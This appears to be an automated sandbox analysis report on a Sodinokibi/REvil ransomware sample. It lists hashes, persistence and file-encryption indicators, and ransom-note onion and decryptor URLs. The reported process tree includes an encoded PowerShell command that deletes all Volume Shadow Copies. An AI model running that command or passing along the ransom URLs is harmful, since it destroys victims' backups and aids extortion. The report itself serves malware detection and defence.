Analysis
- max time kernel: 145s
- max time network: 184s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 24-01-2022 02:07

Static task: static1

Behavioral task: behavioral1
- Sample: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
- Resource: win7-en-20211208

Behavioral task: behavioral2
- Sample: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
- Resource: win10-en-20211208

General
- Target: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
- Size: 114KB
- MD5: 004fe16edb1a1eb697a4809ea6f379cf
- SHA1: 55b75de0adb55d022d9f8653eb7c84a7a0be4a16
- SHA256: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9
- SHA512: 1645e4095d6e1e959bc93e68ca69ad8ad5c80c5538c4ff680e12140924c6a16a99e29b636beed92f3b20db84aeb8eaca32b00bdeb58fcd0a34c05d2bfc63ce1b
Malware Config
Extracted from: C:\031v3d378i-readme.txt
Family: sodinokibi
URLs:
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FF394E98916B202E
- http://decryptor.cc/FF394E98916B202E
Signatures

- Sodin,Sodinokibi,REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

- Modifies extensions of user files (14 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Process: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
  description / ioc:
    File renamed: C:\Users\Admin\Pictures\MeasureSelect.raw => \??\c:\users\admin\pictures\MeasureSelect.raw.031v3d378i
    File renamed: C:\Users\Admin\Pictures\CompressRestart.tif => \??\c:\users\admin\pictures\CompressRestart.tif.031v3d378i
    File renamed: C:\Users\Admin\Pictures\DenyUnregister.raw => \??\c:\users\admin\pictures\DenyUnregister.raw.031v3d378i
    File renamed: C:\Users\Admin\Pictures\InitializeRepair.tiff => \??\c:\users\admin\pictures\InitializeRepair.tiff.031v3d378i
    File renamed: C:\Users\Admin\Pictures\ReadMount.tif => \??\c:\users\admin\pictures\ReadMount.tif.031v3d378i
    File renamed: C:\Users\Admin\Pictures\UnregisterMount.crw => \??\c:\users\admin\pictures\UnregisterMount.crw.031v3d378i
    File renamed: C:\Users\Admin\Pictures\DisconnectPop.tif => \??\c:\users\admin\pictures\DisconnectPop.tif.031v3d378i
    File renamed: C:\Users\Admin\Pictures\EnableSuspend.png => \??\c:\users\admin\pictures\EnableSuspend.png.031v3d378i
    File renamed: C:\Users\Admin\Pictures\ExpandRegister.png => \??\c:\users\admin\pictures\ExpandRegister.png.031v3d378i
    File renamed: C:\Users\Admin\Pictures\DismountSubmit.tiff => \??\c:\users\admin\pictures\DismountSubmit.tiff.031v3d378i
    File renamed: C:\Users\Admin\Pictures\MountRegister.tif => \??\c:\users\admin\pictures\MountRegister.tif.031v3d378i
    File opened for modification: \??\c:\users\admin\pictures\DismountSubmit.tiff
    File opened for modification: \??\c:\users\admin\pictures\InitializeRepair.tiff
    File renamed: C:\Users\Admin\Pictures\AssertInstall.tif => \??\c:\users\admin\pictures\AssertInstall.tif.031v3d378i
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Process: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
  description / ioc:
    Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
    Set value (str): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\6tdi0IHKR7 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe"
- Enumerates connected drives (3 TTPs, 25 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Process: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
  description / ioc:
    File opened (read-only), one entry per drive root: \??\R:, \??\X:, \??\Y:, \??\H:, \??\K:, \??\N:, \??\Q:, \??\T:, \??\Z:, \??\G:, \??\I:, \??\J:, \??\P:, \??\V:, \??\W:, \??\D:, \??\A:, \??\F:, \??\M:, \??\S:, \??\U:, \??\B:, \??\E:, \??\L:, \??\O:
- Drops file in System32 directory (1 IoC)
  Process: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
  description / ioc:
    File opened for modification: C:\Windows\System32\CatRoot2\dberr.txt
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Process: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
  description / ioc:
    Set value (str): \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dezfr11431t0.bmp"
- Drops file in Program Files directory (37 IoCs)
  Process: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
  description / ioc:
    File opened for modification: \??\c:\program files\DisableGrant.xltm
    File opened for modification: \??\c:\program files\PopSelect.xml
    File opened for modification: \??\c:\program files\ReadRepair.mht
    File opened for modification: \??\c:\program files\ResetEnable.ppsm
    File opened for modification: \??\c:\program files\UseUpdate.M2T
    File opened for modification: \??\c:\program files\RedoOpen.tiff
    File created: \??\c:\program files (x86)\microsoft sql server compact edition\031v3d378i-readme.txt
    File opened for modification: \??\c:\program files\SplitWrite.ps1xml
    File opened for modification: \??\c:\program files\TestUnpublish.emf
    File opened for modification: \??\c:\program files\TraceUnblock.ADTS
    File created: \??\c:\program files\031v3d378i-readme.txt
    File opened for modification: \??\c:\program files\CheckpointBackup.odt
    File opened for modification: \??\c:\program files\ConfirmSelect.avi
    File opened for modification: \??\c:\program files\GrantUnblock.rar
    File opened for modification: \??\c:\program files\PopBackup.txt
    File opened for modification: \??\c:\program files\ClearResolve.xltx
    File opened for modification: \??\c:\program files\FormatClear.bmp
    File opened for modification: \??\c:\program files\MoveCheckpoint.xla
    File opened for modification: \??\c:\program files\PingUpdate.m4v
    File opened for modification: \??\c:\program files\RepairShow.wax
    File opened for modification: \??\c:\program files\CompressDisconnect.m1v
    File opened for modification: \??\c:\program files\OutCopy.AAC
    File created: \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\031v3d378i-readme.txt
    File opened for modification: \??\c:\program files\RepairExport.jpg
    File opened for modification: \??\c:\program files\ResolveSearch.aifc
    File opened for modification: \??\c:\program files\UpdateUnblock.wax
    File opened for modification: \??\c:\program files\UnregisterUnblock.xht
    File created: \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\031v3d378i-readme.txt
    File created: \??\c:\program files (x86)\031v3d378i-readme.txt
    File opened for modification: \??\c:\program files\ApproveWait.mp4v
    File opened for modification: \??\c:\program files\BlockCompress.dotx
    File opened for modification: \??\c:\program files\OpenGrant.DVR-MS
    File opened for modification: \??\c:\program files\OpenWait.odt
    File opened for modification: \??\c:\program files\AssertConnect.TTS
    File opened for modification: \??\c:\program files\CompareWatch.vssx
    File opened for modification: \??\c:\program files\ConvertBackup.ods
    File opened for modification: \??\c:\program files\SwitchCompare.iso
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe, powershell.exe
  pid / process:
    268  4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
    572  powershell.exe
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe, powershell.exe, vssvc.exe
  description / pid / process:
    Token: SeDebugPrivilege          268   4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
    Token: SeDebugPrivilege          572   powershell.exe
    Token: SeBackupPrivilege         1492  vssvc.exe
    Token: SeRestorePrivilege        1492  vssvc.exe
    Token: SeAuditPrivilege          1492  vssvc.exe
    Token: SeTakeOwnershipPrivilege  268   4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Process: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
  description / pid / process / target process:
    PID 268 wrote to memory of 572   268  4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe  powershell.exe
    PID 268 wrote to memory of 572   268  4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe  powershell.exe
    PID 268 wrote to memory of 572   268  4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe  powershell.exe
    PID 268 wrote to memory of 572   268  4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe  powershell.exe
Processes

- C:\Users\Admin\AppData\Local\Temp\4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe"
  - Modifies extensions of user files
  - Adds Run key to start application
  - Enumerates connected drives
  - Drops file in System32 directory
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - Child process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding

- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/268-55-0x0000000076141000-0x0000000076143000-memory.dmp (Filesize: 8KB)
- memory/572-56-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp (Filesize: 8KB)
- memory/572-57-0x0000000002380000-0x0000000002382000-memory.dmp (Filesize: 8KB)
- memory/572-60-0x0000000002384000-0x0000000002387000-memory.dmp (Filesize: 12KB)
- memory/572-59-0x0000000002382000-0x0000000002384000-memory.dmp (Filesize: 8KB)
- memory/572-58-0x000007FEF34B0000-0x000007FEF400D000-memory.dmp (Filesize: 11.4MB)
- memory/572-61-0x000000001B850000-0x000000001BB4F000-memory.dmp (Filesize: 3.0MB)
- memory/572-62-0x000000000238B000-0x00000000023AA000-memory.dmp (Filesize: 124KB)